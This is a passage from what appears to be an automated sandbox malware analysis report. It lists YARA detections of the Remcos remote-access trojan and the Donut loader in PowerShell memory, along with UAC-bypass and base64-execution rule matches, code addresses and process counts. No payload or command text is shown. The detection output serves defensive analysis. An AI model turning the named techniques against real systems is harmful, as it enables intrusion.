                Source: Yara matchFile source: 0000003B.00000002.3330103811.0000000007990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1741165047.0000000008F17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: cmd.exeProcess created: 48

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000045.00000002.3697036706.0000000006222000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000026.00000002.2225364286.000000000905C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000015.00000002.1710338990.00000000062AA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000002B.00000002.2304819417.0000000005768000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000036.00000002.2752043117.0000000006409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000045.00000002.3662195780.000000000612A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000040.00000002.3153245033.0000000005909000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000021.00000002.2065499351.000000000940C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000004A.00000002.3841541946.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001A.00000002.1896532258.000000000882C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000002B.00000002.2310039510.0000000005808000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000004F.00000002.4053384894.0000000005E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000015.00000002.1741165047.0000000008F1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000021.00000002.1999505719.00000000067FD000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001A.00000002.1844562182.0000000005B26000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000040.00000002.3745750171.000000000873C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000026.00000002.2139303917.000000000613A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000036.00000002.3152004242.00000000094AC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000015.00000002.1741631380.000000000B6F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000015.00000002.1705682112.000000000601E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000004A.00000002.3877751859.000000000599B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000B.00000002.1579785873.000000000A8F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000021.00000002.1996382580.000000000675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000030.00000002.2524810033.00000000063CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000003B.00000002.2993784459.0000000006309000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000B.00000002.1585464360.000000000AD59000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000004F.00000002.4085361601.0000000005EEC000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000003B.00000002.3497316854.000000000936C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000036.00000002.2777033949.00000000064A9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000003B.00000002.2973427482.0000000006269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001A.00000002.1842508364.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000B.00000002.1577369550.0000000009D58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000002B.00000002.2404458461.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000026.00000002.2143751042.00000000061DA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000021.00000002.2066027425.000000000ABE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000036.00000002.3162188875.000000000AC11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000030.00000002.2547920074.0000000006484000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000030.00000002.2770159710.000000000925C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000001A.00000002.1899196584.000000000A001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5808, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5808, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6188, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6188, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0ADD51A0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,11_2_0ADD51A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004016FD NtdllDefWindowProc_A,15_2_004016FD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004017B7 NtdllDefWindowProc_A,15_2_004017B7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00402CAC NtdllDefWindowProc_A,16_2_00402CAC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00402D66 NtdllDefWindowProc_A,16_2_00402D66
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0ADD51A011_2_0ADD51A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0040503815_2_00405038
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0041208C15_2_0041208C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004050A915_2_004050A9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0040511A15_2_0040511A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0043C13A15_2_0043C13A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004051AB15_2_004051AB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044930015_2_00449300
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0040D32215_2_0040D322
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044A4F015_2_0044A4F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0043A5AB15_2_0043A5AB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0041363115_2_00413631
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044669015_2_00446690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044A73015_2_0044A730
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004398D815_2_004398D8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004498E015_2_004498E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044A88615_2_0044A886
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0043DA0915_2_0043DA09
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00438D5E15_2_00438D5E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00449ED015_2_00449ED0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0041FE8315_2_0041FE83
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00430F5415_2_00430F54
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_004050C216_2_004050C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_004014AB16_2_004014AB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0040513316_2_00405133
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_004051A416_2_004051A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0040124616_2_00401246
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0040CA4616_2_0040CA46
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0040523516_2_00405235
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_004032C816_2_004032C8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0040168916_2_00401689
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00402F6016_2_00402F60
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00413025 appears 78 times
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000045.00000002.3697036706.0000000006222000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000026.00000002.2225364286.000000000905C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000015.00000002.1710338990.00000000062AA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000002B.00000002.2304819417.0000000005768000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000036.00000002.2752043117.0000000006409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000045.00000002.3662195780.000000000612A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000040.00000002.3153245033.0000000005909000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000021.00000002.2065499351.000000000940C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000004A.00000002.3841541946.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001A.00000002.1896532258.000000000882C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000002B.00000002.2310039510.0000000005808000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000004F.00000002.4053384894.0000000005E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000015.00000002.1741165047.0000000008F1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
